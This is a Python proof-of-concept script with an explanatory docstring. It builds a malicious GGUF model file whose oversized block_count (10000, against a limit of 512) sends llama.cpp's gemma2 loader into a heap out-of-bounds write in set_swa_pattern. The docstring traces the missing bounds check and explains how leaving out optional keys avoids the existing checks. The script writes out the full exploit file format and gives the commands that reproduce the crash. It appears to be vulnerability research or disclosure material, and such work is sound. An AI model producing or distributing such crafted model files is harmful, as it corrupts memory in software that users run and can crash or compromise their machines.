#!/usr/bin/env python3
"""
PoC: Heap OOB write in llama.cpp via unvalidated n_layer (block_count) parameter.
Vulnerability:
In src/llama-model.cpp line 520, hparams.n_layer is read from the GGUF file:

    ml.get_key(LLM_KV_BLOCK_COUNT, hparams.n_layer);

There is NO upper bound check against LLAMA_MAX_LAYERS (512). However, the
hparams arrays that are indexed by layer number are all fixed-size
std::array<..., LLAMA_MAX_LAYERS> where LLAMA_MAX_LAYERS = 512:

    std::array<uint32_t, 512> swa_layers;
    std::array<bool,     512> recurrent_layer_arr;
    std::array<uint32_t, 512> n_head_arr;
    std::array<uint32_t, 512> n_head_kv_arr;
    std::array<uint32_t, 512> n_ff_arr;
Note: n_expert IS checked (line 537: GGML_ASSERT(hparams.n_expert <= LLAMA_MAX_EXPERTS)),
proving the developers intended bounds checks but missed n_layer.
Exploitation path (gemma2 architecture):
In the LLM_ARCH_GEMMA2 case (line 1323), set_swa_pattern(2) is called
at line 1327 BEFORE any other key reads.
set_swa_pattern() in llama-hparams.cpp does:

    for (uint32_t il = 0; il < n_layer; ++il) {
        swa_layers[il] = ...;
    }
When n_layer = 10000, this writes 9488 uint32_t values (9488 * 4 = 37952 bytes)
past the end of the swa_layers[512] array on the heap, corrupting through
the rest of hparams and past the end of the llama_model allocation.
The common-path get_key_or_arr() calls for n_ff_arr and n_head_arr at
lines 570-576 DO have an n > N_MAX check, but only AFTER checking if the
key exists. Since these keys are optional (required=false), omitting them
from the GGUF file causes an early return before the bounds check, allowing
execution to reach the arch-specific switch case.
Attack:
- GGUF v3 file with architecture = "gemma2"
- block_count = 10000 (way above 512 limit)
- Minimal required keys: context_length, embedding_length, block_count
- The OOB write corrupts heap memory past the llama_model allocation
Confirmed results:
- ASan build: heap-buffer-overflow detected at llama-hparams.cpp:15
in llama_hparams::set_swa_pattern(), WRITE of size 4
- Regular build: SIGSEGV (exit code 139) due to heap corruption
- Only a 256-byte GGUF file is needed (zero tensors, minimal KV pairs)
"""
import struct
import os
# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF KV types
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8
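# These ids follow the GGUF metadata value-type enum from the GGUF spec
# (UINT32 = 4, FLOAT32 = 6, STRING = 8). Array-valued keys would use type 9
# (ARRAY), e.g. a per-layer head_count, but this PoC deliberately omits all
# array/optional keys so that loading reaches the gemma2-specific code path.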
# Malicious n_layer value (must be > 512 = LLAMA_MAX_LAYERS)
# Using 10000 to write 10000*4=40000 bytes into a 512*4=2048 byte array,
# overflowing by ~38KB which is enough to go past the entire llama_model
# heap allocation and trigger ASan detection.
MALICIOUS_N_LAYER = 10000
def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
def write_kv_string(f, key, value):
    """Write a KV pair with a string value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)
def write_kv_uint32(f, key, value):
    """Write a KV pair with a uint32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
    """Write a KV pair with a float32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))
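# For illustration (derived from the helpers above): the trigger pair written by
# write_kv_uint32(f, "gemma2.block_count", 10000) occupies 34 bytes on disk,
# all integers little-endian:
#    8 bytes   key length  = 18
#   18 bytes   key bytes   = "gemma2.block_count"
#    4 bytes   value type  = 4           (GGUF_TYPE_UINT32)
#    4 bytes   value       = 10 27 00 00 (10000 = 0x2710)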
def create_nlayer_oob_gguf(output_path):
    """Create a GGUF file that triggers a heap OOB write via n_layer > 512."""
    # Architecture string used as the prefix for model keys: "gemma2"
    arch = "gemma2"
    # KV pairs we need to provide:
    #   1. general.architecture = "gemma2"  (required for arch detection)
    #   2. gemma2.context_length = 8192     (required, line 517)
    #   3. gemma2.embedding_length = 256    (required, line 518)
    #   4. gemma2.block_count = 10000       (required, line 520 -- THE TRIGGER)
    #   5. gemma2.attention.layer_norm_rms_epsilon (required in the gemma2 case, line 1334)
    #      BUT set_swa_pattern is called at line 1327 BEFORE this key is read,
    #      so the OOB write happens regardless. We include it to avoid a throw
    #      that might confuse the output -- it is not needed for the OOB itself.
    #
    # Keys we intentionally OMIT:
    #   - gemma2.feed_forward_length     (optional, would trigger the n > N_MAX check)
    #   - gemma2.attention.head_count    (optional, would trigger the n > N_MAX check)
    #   - gemma2.attention.head_count_kv (optional)
    kv_pairs = [
        ("string", "general.architecture", arch),
        ("uint32", f"{arch}.context_length", 8192),
        ("uint32", f"{arch}.embedding_length", 256),
        ("uint32", f"{arch}.block_count", MALICIOUS_N_LAYER),
        ("float32", f"{arch}.attention.layer_norm_rms_epsilon", 1e-6),
    ]
    n_kv = len(kv_pairs)
    n_tensors = 0  # no tensors needed; the OOB happens during hparams loading
    with open(output_path, 'wb') as f:
        # ===== GGUF Header =====
        f.write(GGUF_MAGIC)                       # magic: "GGUF"
        f.write(struct.pack('<I', GGUF_VERSION))  # version: 3
        f.write(struct.pack('<Q', n_tensors))     # n_tensors: 0
        f.write(struct.pack('<Q', n_kv))          # n_kv
        # ===== KV Pairs =====
        for kv_type, key, value in kv_pairs:
            if kv_type == "string":
                write_kv_string(f, key, value)
            elif kv_type == "uint32":
                write_kv_uint32(f, key, value)
            elif kv_type == "float32":
                write_kv_float32(f, key, value)
        # ===== Alignment padding =====
        # GGUF requires the data section to be aligned to 32 bytes.
        # Even with 0 tensors, write the padding for format compliance.
        current_pos = f.tell()
        alignment = 32
        padding_needed = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding_needed)
    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*] Architecture: {arch}")
    print(f"[*] block_count (n_layer): {MALICIOUS_N_LAYER} (LLAMA_MAX_LAYERS = 512)")
    print("[*]")
    print("[*] Vulnerability: set_swa_pattern() (called from llama-model.cpp:1327) writes")
    print(f"[*]   swa_layers[il] for il = 0..{MALICIOUS_N_LAYER - 1},")
    print("[*]   but swa_layers is std::array<uint32_t, 512>")
    print(f"[*]   => {MALICIOUS_N_LAYER - 512} OOB writes = {(MALICIOUS_N_LAYER - 512) * 4} bytes past the end")
    print("[*]")
    print("[*] Test with:")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]")
    print("[*] Test with an ASan build:")
    print(f"[*]   ./build-asan/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]")
    print("[*] Expected: heap-buffer-overflow or crash")
if __name__ == "__main__":
    output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_nlayer_oob.gguf"
    # Create the output directory (not the script's own directory) if it is missing.
    os.makedirs(os.path.dirname(os.path.abspath(output_path)), exist_ok=True)
    create_nlayer_oob_gguf(output_path)